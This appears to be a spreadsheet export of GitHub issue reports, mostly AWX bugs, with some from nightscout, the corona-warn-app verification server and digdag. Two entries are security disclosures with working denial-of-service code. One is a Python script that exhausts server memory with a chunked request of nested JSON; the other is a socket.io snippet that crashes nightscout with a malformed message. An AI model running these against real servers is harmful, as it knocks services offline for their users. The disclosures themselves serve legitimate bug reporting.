    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary One older article describes how ansible_facts can be used to create smart inventory within AWX/Ansible tower: https://www.ansible.com/blog/ansible-tower-advanced-smart-inventory-usage Unfortunately this feature seems to be broken or not properly documented, as API doesn't seem to be recognizing field ansible_facts. GET to /api/v2/hosts/?ansible_facts.ansible_distribution_version=18.04 ``` HTTP 400 Bad Request Allow: GET, POST, HEAD, OPTIONS Content-Type: application/json Vary: Accept X-API-Node: awx-6bd564b87c-26bv6 X-API-Product-Name: AWX X-API-Product-Version: 19.3.0 X-API-Time: 0.005s { "error": "Host has no field named 'ansible_facts.ansible_distribution_version'" } ``` ### AWX version 19.3.0 ### Installation method kubernetes ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser Firefox ### Steps to reproduce 1. Go to Inventory 2. Add - Smart Inventory 3. Try to filter using "Smart host filter" field Alternative: 1. Go to /api/v2/hosts/ 2. try using query string with desired field (eg /api/v2/hosts/?ansible_facts.ansible_distribution_version=18.04) ### Expected results API queries facts and displays hosts that only match those facts ### Actual results API complains that the field is incorrect ### Additional information Using any top-level field works normally: eg. /api/v2/hosts/?id=302 (if host with ID 302 in AWX exists) returns properties for that host. It would appear that since the ansible_facts is just a reference to additional page that the API is not able to query it.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11130</t>
  </si>
  <si>
    <t>Disable editing more fields of `controlplane` group</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary Users are able to modify several fields of the `controlplane` instance group, which they probably shouldn't be allowed to edit (these edits will break things). ### AWX version 19.2.2 ### Installation method docker on linux ### Modifications no ### Ansible version devel ### Operating system N/A ### Web browser Chrome ### Steps to reproduce PATCH to `/api/v2/instance_groups/N/` where that record has the `name` of "controlplane" try giving all the fields (individually) a non-default value: ```json "name": "controlplane", "is_container_group": false, "credential": null, "policy_instance_percentage": 98, "policy_instance_minimum": 0, "policy_instance_list": [], "pod_spec_override": "" ``` ### Expected results Most of these should give a 400 error ### Actual results Only modifying `name` gives a 400 Out of the others, particularly problematic seeming ones are: - I can set `is_container_group` to true... that doesn't sound good - I can set `policy_instance_percentage` to a value lower than what was set by the installer, which is probably not desired (maybe arguable? but I doubt it) - I can add execution nodes to `policy_instance_list`, which is absolutely not okay ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11229</t>
  </si>
  <si>
    <t>Ansible collection - job_template module unable to update survey spec</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary Using the job_template module, I am unable to update/add/delete "survey_spec.spec", when I only change the "survey_spec.spec" and nothing else. If some other JobTemplate property changes, everthing works fine and the survey will update as well. ### AWX version 19.2.2 ### Installation method kubernetes ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce only add a single survey question with the job_template module to an existing job template ### Expected results survey should have a new survey question and the task should be marked as changed ### Actual results The new question is in the task output, but it is not added to the job template and the task is not marked as changed. ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11350</t>
  </si>
  <si>
    <t>Instance group basic Name search missing __icontains</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary When searching a list of instance groups the __icontains parameter is missing. This means that a user can do a basic search for a string contained within the name of an existing instance group, and the UI will return no results. ![image](https://user-images.githubusercontent.com/63685497/142051117-77ea7fad-6d6e-4d35-a830-66435ac89c29.png) ### AWX version 4.1 ### Installation method docker on linux ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce To reproduce: 1. Create an instance group 2. Visit the list of instance groups and do a basic Name search for part of the name you gave the instance group. No results. ### Expected results If an instance group exists, searching for part of the name should bring up a result. ### Actual results The UI shows no results ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11442</t>
  </si>
  <si>
    <t>Workflow Visualizer making endless API requests with no result</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary When a user creates a workflow and saves and is redirected to the visualizer screen, API requests happen endlessly, with no result. Note: I am able to recreate this on an ec2 instance as well as a local build. ### AWX version devel ### Installation method docker on linux ### Modifications no ### Ansible version _No response_ ### Operating system Fedora 35 ### Web browser Chrome ### Steps to reproduce 1. access the templates page. 2. create a new workflow template. 3. when the redirect to the visualizer happens, you will see the problem. https://user-images.githubusercontent.com/63685497/145466510-0b5de590-ee87-446e-9b58-058ce7bca611.mp4 ### Expected results user would be able to create, save, and launch a workflow. ### Actual results the visualizer is not working properly and submits endless API requests. ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11452</t>
  </si>
  <si>
    <t>TypeError: Converting circular structure to JSON trying to relaunch Jobs</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary Trying to relaunch a job is causing `Failed to launch job.` `TypeError: Converting circular structure to JSON --&gt; starting at object with constructor 'HTMLButtonElement'` ### AWX version devel ### Installation method docker on linux ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser Chrome ### Steps to reproduce 1. Create a job template 2. Launch this JT 3. Go to jobs list 4. Relaunch the job ### Expected results The job to relaunch successfully and run ### Actual results ``` TypeError: Converting circular structure to JSON --&gt; starting at object with constructor 'HTMLButtonElement' | property '__reactFiber$ufx73v3ec7m' -&gt; object with constructor 'Bl' --- property 'stateNode' closes the circle at stringify (&lt;anonymous&gt;) at https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:912670 at Object.l.transformRequest (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:912674) at https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1450812 at Object.u [as forEach] (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:356646) at Object.e.exports (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1450785) at e.exports (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1450199) at u.request (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1449016) at u.r.forEach.u.&lt;computed&gt; [as post] (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1449469) at Function.post (https://localhost:8043/static/js/2.c2ae93d7.chunk.js:2:1059419) ``` ![image](https://user-images.githubusercontent.com/12464858/145837634-7227b6ae-d1e4-4553-9a74-c5bc68aa3569.png) ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11505</t>
  </si>
  <si>
    <t>Cannot create manual project in Japanese (possibly all non-English languages)</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary _No response_ ### AWX version 19.5.0 ### Installation method docker for mac ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce 1. Compile strings 2. Start up AWX 3. Set default browser language to Japanese (UI should now render in Japanese for translated strings) 4. Attempt to create a manual project ### Expected results A manual project is created ### Actual results Project creation fails ### Additional information I suspect that we are sending the translated string back to the API rather than `manual` which is what it is expecting.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11523</t>
  </si>
  <si>
    <t>/api/v2/ping is returning wrong value in "heartbeat" field</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary Summary: I believe that this behavior where two endpoints ( `/api/v2/ping` and `/api/v2/instances/` ) return different values for the same "heartbeat" like field is not consistent, and I think that `/api/v2/ping` "heartbeat" field should be mapped to `last_health_check` field of `Instance` model. Details: In AAP1.2 (Tower 3.8.4) `/api/v2/ping` response, "heartbeat" field was mapped to `instance.modified` (*), and the value "heartbeat" field in the response was returning a new updated value every minute. ~~~ /var/lib/awx/venv/awx/lib/python3.6/site-packages/awx/api/views/root.py class ApiV2PingView(APIView): ... def get(self, request, format=None): ... for instance in Instance.objects.all(): response['instances'].append(dict(node=instance.hostname, uuid=instance.uuid, heartbeat=instance.modified, &lt;=== capacity=instance.capacity, version=instance.version)) ~~~ This is not the case anymore in AAP2.1 (Ansible Automation Platform Controller 4.1.0). I see that in AAP2.1 (Ansible Automation Platform Controller 4.1.0) `/api/v2/ping` "heartbeat" field is **still** mapped to modified , and not to `last_seen` nor to `last_health_check` that have been introduced for this purpose. ~~~ /var/lib/awx/venv/awx/lib/python3.8/site-packages/awx/api/views/root.py 133 class ApiV2PingView(APIView): 134 """A simple view that reports very basic information about this 135 instance, which is acceptable to be public information. 136 """ .. 143 def get(self, request, format=None): ... 152 for instance in Instance.objects.all(): 153 response['instances'].append( 154 dict( ... 158 heartbeat=instance.modified, &lt;======= ... ~~~ Because of that, `/api/v2/ping` will not return a new value every minute, it will return a new value only if the user fiddles manually with the instance properties (e.g. any change on Administration &gt; Instance Group &gt; "any instance group" &gt; Instance Page, etc.). Now, being said that in AAP2.1 (Ansible Automation Platform Controller 4.1.0) `/api/v2/instances/` **does** return correctly all the fields, including last_seen and last_health_check which are updated every minute as expected. (*) back then, there was no `last_seen` nor `last_health_check` field in the Instance model ### AWX version Red Hat Downstream AAP2.1 ### Installation method docker on linux ### Modifications no ### Ansible version Ansible Automation Platform Controller 4.1.0 ### Operating system Linux RHEL8.3 ### Web browser Firefox ### Steps to reproduce Access `https://&lt;awx-url&gt;/api/v2/ping/` and compare the response with the one from `https://192.168.122.106/api/v2/instances/`. "heartbeat" value from `ping` endpoint will be older than the same value from `instances` endpoint. ### Expected results "heartbeat" value from `ping` endpoint should match "last_seen" and "last_health_check" values from `instances` endpoint results. (Not sure about "last_seen", but in my tests, said field have always had the same value as "last_health_check" field so far) ### Actual results "heartbeat" value from `ping` endpoint will be older than the same value from `instances` endpoint. ### Additional information Likely related commit: https://github.com/ansible/tower/commit/6a17e5b65bf9421c2e650d23817c79ce81248c6f Likely related issue: https://github.com/ansible/awx/issues/10737</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11622</t>
  </si>
  <si>
    <t>Hop nodes instances can be modified</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Summary After merging https://github.com/ansible/awx/pull/11591 the hop nodes are now exposed in `/api/v2/instances/`. Example: ``` { "id": 4, "type": "instance", "url": "/api/v2/instances/4/", "related": { "jobs": "/api/v2/instances/4/jobs/", "instance_groups": "/api/v2/instances/4/instance_groups/" }, "uuid": "00000000-0000-0000-0000-000000000000", "hostname": "receptor-hop", "created": "2022-01-26T19:15:07.439405Z", "modified": "2022-01-26T19:27:58.447951Z", "last_seen": "2022-01-27T13:36:46.163205Z", "last_health_check": null, "errors": "", "capacity_adjustment": "1.00", "version": "", "capacity": 0, "consumed_capacity": 0, "percent_capacity_remaining": 0.0, "jobs_running": 0, "jobs_total": 0, "cpu": 0, "memory": 0, "cpu_capacity": 0, "mem_capacity": 0, "enabled": false, "managed_by_policy": false, "node_type": "hop" } ``` and now is possible to `PUT` or `PATCH` the values through API ``` { "capacity_adjustment": "1.00", "enabled": false, "managed_by_policy": false } ``` although setting capacity to 0 enabld to false is not making the job to faul, @jbradberry do we want allow users to patch/put on hop node instances? ### AWX version devel ### Installation method docker on linux ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser Chrome ### Steps to reproduce 1. Go to /api/v2/instances/&lt;id&gt;/ 2. patch any value: ``` { "capacity_adjustment": 1.0, "enabled": true, "managed_by_policy": true } ``` ### Expected results These fields to be not modifyable for hop nodes? ### Actual results 1. The user can change those values 2. This is not making the job to fail 3. The hop nodes instances are showing as `disabled` in the mesh view (may confuse users) ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/12046</t>
  </si>
  <si>
    <t>Disable isCreatable for Select component on Advanced Search</t>
  </si>
  <si>
    <t>##### SUMMARY Disable isCreatable for Select component on Advanced Search. This prop leads to invalid API searches. &lt;img width="1496" alt="image" src="https://user-images.githubusercontent.com/9053044/163234927-b4b0c433-435e-4a28-923a-26eafa17f8ef.png"&gt; &lt;img width="1498" alt="image" src="https://user-images.githubusercontent.com/9053044/163234857-a07d7a9a-1da5-41f9-8ae5-e23213f877ca.png"&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/12992</t>
  </si>
  <si>
    <t>scm_url doesn't allow [IPV6]:portnum format</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Bug Summary IPv6 addresses like `http://user:pass@[4444:5555:6666:7777:8888:11]:3000/sbf/foster.git` throws an error when attempting to sync a project with that scm_url `update_scm_url` is where the traceback is the issue is that we strip down the address and reform it, but when reforming we don't add the brackets back in. `netloc = u'@'.join(filter(None, [netloc, parts.hostname]))` parts.hostname does not include the brackets if the original url had brackets around the hostname, then we should re-add them back in ### AWX version awx: 21.5.1.dev244+g5b5aac675b.d20221003 ### Select the relevant components - [ ] UI - [X] API - [ ] Docs - [ ] Collection - [ ] CLI - [ ] Other ### Installation method docker development environment ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce create project with scm_url `http://user:pass@[4444:5555:6666:7777:8888:11]:3000/sbf/foster.git` attempt to launch a job ### Expected results job runs ### Actual results ```Traceback (most recent call last): File "/awx_devel/awx/main/utils/common.py", line 249, in update_scm_url if scm_type not in ('git', 'svn', 'insights', 'archive'): File "/usr/lib64/python3.9/urllib/parse.py", line 178, in port raise ValueError(message) from None ValueError: Port could not be cast to integer value as '5555:6666:7777:8888:11:3000' During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/awx_devel/awx/main/tasks/jobs.py", line 512, in run self.build_extra_vars_file(self.instance, private_data_dir) File "/awx_devel/awx/main/tasks/jobs.py", line 1228, in build_extra_vars_file scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update) File "/awx_devel/awx/main/tasks/jobs.py", line 1203, in _build_scm_url_extra_vars scm_url = update_scm_url(scm_type, scm_url, scp_format=True) File "/awx_devel/awx/main/utils/common.py", line 249, in update_scm_url if scm_type not in ('git', 'svn', 'insights', 'archive'): ValueError: Invalid git URL``` ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/13120</t>
  </si>
  <si>
    <t>Add Conjur Cloud support to CyberArk Conjur Secrets Lookup credential plugin</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Bug Summary Conjur Cloud adds the requirement of `/api` after the base domain of the service prior to endpoints that are currently configured in the credential plugin. Providing `/api` as part of the URL on the secret lookup gets trimmed by `urllib.parse.urljoin()` that builds the URL to send API requests when executing the credential plugin. ### AWX version 21.7.0 ### Select the relevant components - [ ] UI - [X] API - [ ] Docs - [ ] Collection - [ ] CLI - [ ] Other ### Installation method docker development environment ### Modifications no ### Ansible version 2.13.5 ### Operating system Ubuntu 22.04.1 LTS ### Web browser _No response_ ### Steps to reproduce With a Conjur Cloud tenant available to target, configure the CyberArk Conjur Secrets Lookup external management system credential plugin as documented. ### Expected results Tests should pass successfully. ### Actual results Tests to retrieve a secret will return `HTTP 404`. ### Additional information A PR is prepared and will be submitted shortly.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/13429</t>
  </si>
  <si>
    <t>admin_role disassociated despite remove_admins = false</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Bug Summary After upgrading from AWX 21.5.1 to 21.10.2 all organization admin roles were removed from the users' accounts. We're using LDAP with an organization map looking like this: ``` { "Org1": { "admins": false, "remove_admins": false, "remove_users": true, "users": [ "CN=..." ] } } ``` Users were manually granted the organization admin role. That had worked before, but after the upgrade, the role was removed from the users with the following activity message: ``` | 13.1.2023, 14:10:40 | system | disassociated Org1 admin_role from jdoe ``` And AWX was logging the following: ``` DEBUG [4ecb27399afb4cb7b9ad2fd5e666a8ca] awx.sso.backends LDAP adapter removing user jdoe permission of admin_role from organization Org1 ``` I tried to remove '"admins": false' from the config or replace it with an empty list ('admins": [],') but that didn't change anything. "None" was not accepted by the form. According to the Automation Platform docs that should work: https://docs.ansible.com/automation-controller/4.2.1/html/administration/social_auth.html#organization-mapping This seems to be related to the following PR: https://github.com/ansible/awx/pull/12949 ### AWX version 21.10.2 ### Select the relevant components - [ ] UI - [X] API - [ ] Docs - [ ] Collection - [ ] CLI - [ ] Other ### Installation method docker development environment ### Modifications no ### Ansible version 2.12.2 ### Operating system Debian 11 ### Web browser Firefox ### Steps to reproduce 1) Add default LDAP settings 2) Create an organization map with "admins: false" 3) Add a user manually as organization admin to an organization 4) Login with that user and recognize that the admin_role was removed ### Expected results The system doesn't remove the admin_role from the user. ### Actual results The admin_role is removed from the user ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/13439</t>
  </si>
  <si>
    <t>CyberArk Conjur lookup plugin does not work with open source Conjur version</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Bug Summary The CyberArk Conjur Secrets Manager Lookup plugin no longer supports the lookup against the Conjur OSS. Most likely because the opensource conjure version API endpoint does not have the `/api/` portion recently added by this change: https://github.com/ansible/awx/pull/13121 ### AWX version 2.4 ### Select the relevant components - [ ] UI - [X] API - [ ] Docs - [ ] Collection - [ ] CLI - [ ] Other ### Installation method docker development environment ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce 1. Deploy Conjur OSS. We use the latest `cyberark/conjur` image for that. The Conjur version is ``` Version 1.19.1-3398 API Version 5.3.0 ``` 2. Under the AWX, create the CyberArk Conjur Secrets Manager Lookup credential. Provide Conjure URL, user, and token. 3. Click Test and provide a path. ### Expected results Connection to Conjur should be established. HTTP 200 response. ### Actual results 401 error returned. ``` Traceback (most recent call last): File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/tasks/jobs.py", line 504, in run args = self.build_args(self.instance, private_data_dir, passwords) File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/tasks/jobs.py", line 937, in build_args ssh_username = creds.get_input('username', default='') File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/models/credential/__init__.py", line 275, in get_input return self._get_dynamic_input(field_name) File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/models/credential/__init__.py", line 309, in _get_dynamic_input return input_source.get_input_value() File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/models/credential/__init__.py", line 1250, in get_input_value return backend(**backend_kwargs) File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/credential_plugins/conjur.py", line 72, in conjur_backend raise_for_status(resp) File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/awx/main/credential_plugins/plugin.py", line 12, in raise_for_status resp.raise_for_status() File "/var/lib/awx/venv/awx/lib64/python3.9/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://conjureurl.com/api/authn/test/admin/authenticate ``` ### Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/13597</t>
  </si>
  <si>
    <t>Unable to use CCP lookup plugin with empty webservice_id</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](https://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I might not receive a timely response. ### Bug Summary When job uses the `CyberArk Central Credential Provider Lookup` credential plugin with an empty web service id, it fails with the exception: ``` Traceback (most recent call last): File "/awx_devel/awx/main/tasks/jobs.py", line 508, in run args = self.build_args(self.instance, private_data_dir, passwords) File "/awx_devel/awx/main/tasks/jobs.py", line 941, in build_args ssh_username = creds.get_input('username', default='') File "/awx_devel/awx/main/models/credential/__init__.py", line 275, in get_input return self._get_dynamic_input(field_name) File "/awx_devel/awx/main/models/credential/__init__.py", line 309, in _get_dynamic_input return input_source.get_input_value() File "/awx_devel/awx/main/models/credential/__init__.py", line 1250, in get_input_value return backend(**backend_kwargs) File "/awx_devel/awx/main/credential_plugins/aim.py", line 73, in aim_backend webservice_id = kwargs['webservice_id'] KeyError: 'webservice_id' ``` The issue is only reproducible if we create a CCP lookup credential using API and we do not provide the `webservice_id` key as the input. If you create CCP lookup with UI - everything works fine. ### AWX version devel ### Select the relevant components - [ ] UI - [X] API - [ ] Docs - [ ] Collection - [ ] CLI - [ ] Other ### Installation method docker development environment ### Modifications no ### Ansible version _No response_ ### Operating system _No response_ ### Web browser _No response_ ### Steps to reproduce 1. Create CyberArk Central Credential Provider Lookup credential. Do not provide the WebService ID value, keep it empty. I used API to create credetnail and the webservice_id was missing in the inputs: ``` inputs = { 'url': url, 'app_id': app_id, 'client_key': client_key, 'client_cert': client_cert, 'verify': verify } payload = factories.credential.payload( name=fauxfactory.gen_utf8(), description=fauxfactory.gen_utf8(), credential_type=cred_type, inputs=inputs ) ``` 2. Create Machine credential that uses the CCP lookup credential. Set proper Object query. 3. Create Job Template that uses this credential. Run the job. ### Expected results The lookup should use default webservice id: `AIMWebService` ### Actual results Exception occured. See description. ### Additional information _No response_</t>
  </si>
  <si>
    <t>catwatch</t>
  </si>
  <si>
    <t>https://github.com/zalando-incubator/catwatch/issues/5</t>
  </si>
  <si>
    <t>Bug: Not all repositories of the organizations are listed</t>
  </si>
  <si>
    <t>The current code base fetches not all repositories (GHOrganization.listRepositories() returns only the first page).</t>
  </si>
  <si>
    <t>https://github.com/nightscout/cgm-remote-monitor/issues/3468</t>
  </si>
  <si>
    <t>[API] Treatments with invalid IDs can be uploaded successfully</t>
  </si>
  <si>
    <t>I'm working on a Swift wrapper around the Nightscout API and have encountered a bug with some odd consequences: a treatment can be uploaded with an invalid ID. However, upon querying the API to modify/delete by this ID, the API will return an error response, so the invalid treatment is effectively untouchable. I haven't tested uploading an entry/profile record/device status/etc. with an invalid ID, but I suspect that this issue persists in those cases. Here's a sample of some data that uploaded successfully. Note that the ID is most definitely not a 24-character-long string of hex digits. ``` { "_id": "-5", "notes": "NOT VALID", "eventType": "Note", "duration": 0, "created_at": "2018-03-24T03:15:38", "carbs": null, "insulin": null } ```</t>
  </si>
  <si>
    <t>https://github.com/nightscout/cgm-remote-monitor/issues/5347</t>
  </si>
  <si>
    <t>Alexa and Authentication Roles</t>
  </si>
  <si>
    <t>Following the set up guide fully, it appears Alexa will not connect to a nightscout site that has authentication roles set up. She will read out the BG and connect fine when the endpoint is set to ''https://mynightscoutsite.herokuapp.com/api/v1/alexa'' and no auth roles are active. However, Alexa will not come back with a response if I have authentication roles enabled within nightscout. Even if I add a valid auth role token into the endpoint URL. I'd prefer my nightscout site to remain password protected so if this can be adjusted to allow for token access that would be fantastic. Thanks for all of your development work!</t>
  </si>
  <si>
    <t>https://github.com/nightscout/cgm-remote-monitor/issues/6843</t>
  </si>
  <si>
    <t>Invalid request causes crash of nightscout (potencial DoS)</t>
  </si>
  <si>
    <t>version of socketio client 2.3.0, nightscout 14.1.0 Sample code: const io = require("socket.io-client"); const socket = io.connect('ws://url-of-nightscout/'); socket.emit("authorize"); Log of NS: /opt/app/lib/server/websocket.js:87 ctx.authorization.resolve({ api_secret: message.secret, token: message.token, ip: ip }, function resolved (err, result) { ^ TypeError: Cannot read property 'secret' of undefined at verifyAuthorization (/opt/app/lib/server/websocket.js:87:53) at Socket.authorize (/opt/app/lib/server/websocket.js:503:9) at Socket.emit (events.js:315:20) at /opt/app/node_modules/socket.io/lib/socket.js:528:12 at processTicksAndRejections (internal/process/task_queues.js:75:11)</t>
  </si>
  <si>
    <t>https://github.com/nightscout/cgm-remote-monitor/issues/7910</t>
  </si>
  <si>
    <t>Issue with api v1 returning stale data</t>
  </si>
  <si>
    <t>I have a Mac OS X app that I made that pulls the latest CGM values from Nightscout using v1/entries - a user recently reported that their values are all showing as stale / old. When I looked into it, I can see that he's on the DEV branch of cgm-remote-monitor, and when I hit his v1/entries endpoint and compare to v2/properties it's clear that the v1 endpoint is no longer reporting up-to-date values. I have since upgraded my own instance and I can see the same behaviour. **To Reproduce** Steps to reproduce the behavior: 1. Go to api/v1/entries on a NS instance running 15.0 2. Look at the timestamps / epoc times and you will see they are multiple hours old versus the latest bgnow readings at api/v2/properties **Expected behavior** api/v1/entries should be up to date. - NS version 15.0 - My data comes from loop://iPhone but the other user's data comes from xDrip-DexcomG5 G6 Native - Not specific to a browser or device</t>
  </si>
  <si>
    <t>https://github.com/corona-warn-app/cwa-verification-server/issues/33</t>
  </si>
  <si>
    <t>[BSI][0.3.1-alpha] Fields in Request Body not Checked</t>
  </si>
  <si>
    <t>Rating: Informational Description: Many of the PostMapping functions do not verify the structure of the request bodies before trying to access fields within the JSON data. In case a specific field is not present, the getter functions return Null which leads to NullPointerExceptions when further processing these values. Proof of Concept: [verification_fields_not_checked.txt](https://github.com/corona-warn-app/cwa-verification-server/files/4671782/verification_fields_not_checked.txt)</t>
  </si>
  <si>
    <t>https://github.com/corona-warn-app/cwa-verification-server/issues/55</t>
  </si>
  <si>
    <t>[BSI][0.3.1-alpha] Missing request size limitation leads to memory exhaustion</t>
  </si>
  <si>
    <t xml:space="preserve">Rating: Medium Description: The server as provided by the Docker file does not limit the request size. This enables an attacker to send arbitrary long requests, that have to be cached by the server in memory. In addition, the server uses stream processing of the supplied JSON data. By repeatedly sending the payload {"": we can create lots of nested dictionaries, that will be processed by the server. This yields a *10x amplification in memory usage* on the server in comparison to the traffic sent by the attacker. After sending ~164MB, the server CPU usage goes to 100% and the server becomes unresponsive in this configuration. As a single request was used, rate-limiting is not sufficient. Proof of Concept: python import socket, sys if len(sys.argv) != 3: print ("usage %s target [size in MB]" % sys.argv[0]) sys.exit(-1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 8080)) hdr = "POST /version/v1/registrationToken HTTP/1.1\r\n" hdr += "Host: "+sys.argv[1]+":8080\r\n" hdr += "Content-Type: application/json\r\n" hdr += "Transfer-Encoding: Chunked\r\n" hdr += "\r\n" s.send(hdr) chunk = '{"":'*256*1024 # we create lots of nested dicts chunk = "%x\r\n%s\r\n" % (len(chunk), chunk) for i in range(int(sys.argv[2])-1): s.send(chunk) sys.stderr.write("\rSent %d MB" % i) print("\nDone") #raw_input() </t>
  </si>
  <si>
    <t>https://github.com/treasure-data/digdag/issues/37</t>
  </si>
  <si>
    <t>cannot use _schedule cron&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> $ cat digdag.yml run: +main timezone: "America/Los_Angeles" +main: _schedule: cron&gt;: 42 4 1 * * sh&gt;: echo hello world   $ digdag push dano-cron-test -r 1 2016-04-11 15:46:26 -0700: Digdag v0.5.9 Creating digdag.archive.tar.gz Archiving digdag.yml Workflows: +main error: Status code 400: {"message":"Parameter 'cron' is required but not set","status":400} </t>
  </si>
  <si>
    <t>https://github.com/treasure-data/digdag/issues/52</t>
  </si>
  <si>
    <t>server mode should notify client when version is different same</t>
  </si>
  <si>
